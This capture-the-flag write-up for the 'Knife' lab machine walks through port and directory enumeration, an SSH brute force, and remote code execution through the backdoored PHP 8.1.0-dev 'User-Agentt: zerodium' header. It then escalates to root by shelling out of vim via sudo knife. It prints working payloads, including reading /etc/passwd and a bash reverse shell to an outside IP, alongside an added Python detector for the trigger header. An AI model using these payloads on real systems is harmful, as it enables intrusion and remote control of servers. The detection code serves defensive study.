Knife

Personal Rating: Easy

Enumeration

Starting off with basic enumeration:

  • Open ports: 22, 80

  • Web server: Apache httpd 2.4.41

  • SSH server: OpenSSH 8.2p1

dirb scan:

  • http://10.10.10.242/index.php

  • http://10.10.10.242/server-status (403)

  • http://10.10.10.242/icons (same as index)

  • http://10.10.10.242/icons/small (same as index)

The source code of index.php has interesting parts at the end; is it possibly injectable?

I found this: path.getBoundingClientRect();

I also started an SSH brute force with Hydra, just to have it running in the background.

Wappalyzer plugin: PHP 8.1.0, Apache 2.4.41, Google Font API, Ubuntu

PHP RCE

This PHP remote code execution exploit worked after checking the PHP version:

The exploit relies on a backdoor in this PHP build, and the payload was very simple:

User-Agentt: zerodiumsystem("cat /etc/passwd");

User-Agentt: zerodiumsystem("bash -c 'bash -i >& /dev/tcp/10.10.16.7/4444 0>&1'");
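As an added detection example that is not from the original writeup: this Python snippet parses raw HTTP request headers (constructed samples, one of them carrying the trigger header shown above) and flags any request with the non-standard User-Agentt header, escalating when its value contains the backdoor's "zerodium" marker; it also checks a response's X-Powered-By banner for the compromised PHP/8.1.0-dev build.

```python
from typing import Dict, List

# Constructed sample requests, as a reverse proxy or WAF might capture them
# (not from the original writeup); the second one carries the writeup's
# trigger header, the last one a case variant the backdoor does not accept.
SAMPLE_REQUESTS: List[str] = [
    "GET /index.php HTTP/1.1\r\nHost: 10.10.10.242\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    'GET / HTTP/1.1\r\nHost: 10.10.10.242\r\nUser-Agentt: zerodiumsystem("id");\r\n\r\n',
    "GET / HTTP/1.1\r\nHost: 10.10.10.242\r\nUser-Agentt: Mozilla/5.0\r\n\r\n",
    'GET / HTTP/1.1\r\nHost: 10.10.10.242\r\nuser-agentt: ZERODIUMsystem("id");\r\n\r\n',
]

def parse_headers(raw_request: str) -> Dict[str, str]:
    """Headers of a raw request keyed by lower-cased name; HTTP header names
    are case-insensitive, so 'user-agentt' must hit the same rule as 'User-Agentt'."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers

def classify_request(raw_request: str) -> str:
    """'User-Agentt' is not a standard header, so its presence alone is worth a
    look; the backdoor only fires when the value contains the case-sensitive
    string 'zerodium', which is reported as a trigger attempt."""
    headers = parse_headers(raw_request)
    if "user-agentt" not in headers:
        return "clean"
    if "zerodium" in headers["user-agentt"]:
        return "backdoor-trigger"
    return "suspicious-header"

def is_backdoored_build(x_powered_by: str) -> bool:
    """True if a response's X-Powered-By banner names the compromised
    development build, which identifies itself as PHP/8.1.0-dev."""
    return x_powered_by.strip() == "PHP/8.1.0-dev"

def scan(requests: List[str]) -> List[str]:
    """Verdict per request, in input order."""
    return [classify_request(r) for r in requests]

if __name__ == "__main__":
    for req, verdict in zip(SAMPLE_REQUESTS, scan(SAMPLE_REQUESTS)):
        print(f"{verdict:18} {req.splitlines()[2]}")
```

Note that Apache's default access log does not record custom headers, so this check needs the full request headers from a proxy, WAF or packet capture.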

Custom Script 'chef' PE

I got the user james. I found an SUID binary as well: ./opt/chef-workstation/bin/knife

Looking through the "knife" script, I found "chef 16.10.8", which is vulnerable to a privilege escalation.

This was the final payload, which was simple too:

sudo /usr/bin/knife client create detlef -e vim

Inside the vim editor that knife opens as root:

:!/bin/bash

# python3 -c 'import pty; pty.spawn("/bin/bash")'
